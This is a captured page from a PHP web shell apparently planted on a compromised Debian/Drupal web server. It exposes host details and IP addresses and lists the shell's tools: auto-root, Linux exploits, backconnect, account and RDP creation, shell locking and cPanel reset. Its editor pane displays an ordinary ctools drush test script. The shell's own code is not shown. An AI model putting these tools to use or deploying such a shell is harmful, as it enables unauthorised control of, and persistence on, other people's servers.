Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.94.236
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools_export_test
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
context.test
1.9
KB
-rw-r--r--
css.test
3.47
KB
-rw-r--r--
css_cache.test
1.11
KB
-rw-r--r--
ctools.drush.sh
2.59
KB
-rw-r--r--
ctools.plugins.test
3.96
KB
-rw-r--r--
ctools_plugin_test.info
509
B
-rw-r--r--
ctools_plugin_test.module
1.53
KB
-rw-r--r--
math_expression.test
6.35
KB
-rw-r--r--
math_expression_stack.test
1.79
KB
-rw-r--r--
object_cache.test
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ctools.drush.sh
#!/bin/bash # Run this from the terminal inside a drupal root folder # i.e. DRUPAL_ROOT_DIR/sites/all/modules/contrib/ctools/tests/ctools.drush.sh function stamp { echo ============== echo timestamp : `date` echo ============== } DRUPAL_ROOT=`drush dd` MODULE_DIR="$DRUPAL_ROOT/sites/all/modules" MODULE_NAME="ctools_drush_test" stamp echo 'Enabling ctools, views, and bulk_export modules.' drush en ctools views bulk_export --yes stamp echo 'Reading all export info' drush ctools-export-info stamp echo 'Reading all export info with format' drush ctools-export-info --format=json stamp echo 'Reading tables only from export info' drush ctools-export-info --tables-only stamp echo 'Reading tables only from export info with format' drush ctools-export-info --tables-only --format=json stamp echo 'Reading all disabled exportables' drush ctools-export-info --filter=disabled stamp echo 'Enabling all default views' drush ctools-export-enable views_view --yes stamp echo 'Reading all enabled exportables' drush ctools-export-info --filter=enabled stamp echo 'Reading all overridden exportables' drush ctools-export-info --filter=overridden stamp echo 'Reading all database only exportables' drush ctools-export-info --filter=database stamp echo 'View all default views export data' drush ctools-export-view views_view --yes stamp echo 'View default "archive" view export data' drush ctools-export-view views_view archive stamp echo 'Disable default "archive" view' drush ctools-export-disable views_view archive stamp echo 'Enable default "archive" view' drush ctools-export-enable views_view archive stamp echo 'Reading all enabled exportables (archive disabled)' drush ctools-export-info stamp echo 'Disabling all default views' drush ctools-export-disable views_view --yes stamp echo 'Revert all default views' drush ctools-export-revert views_view --yes stamp echo 'Enable all node views' drush ctools-export-enable views_view --module=node --yes stamp echo 'Disable all node views' drush ctools-export-disable views_view --module=node --yes stamp echo 'Revert all node views' drush ctools-export-revert views_view --module=node --yes stamp echo 'Revert all exportables' drush ctools-export-revert --all --yes stamp echo 'Enable all exportables' drush ctools-export-enable --all --yes stamp echo 'Disable all exportables' drush ctools-export-disable --all --yes stamp echo 'Bulk export all objects' drush ctools-export $MODULE_NAME --subdir='tests' --choice=1 stamp echo 'Show all files in created folder' ls -lAR "$MODULE_DIR/tests/$MODULE_NAME" stamp echo 'Removing exported object files' rm -Rf $MODULE_DIR/tests
Close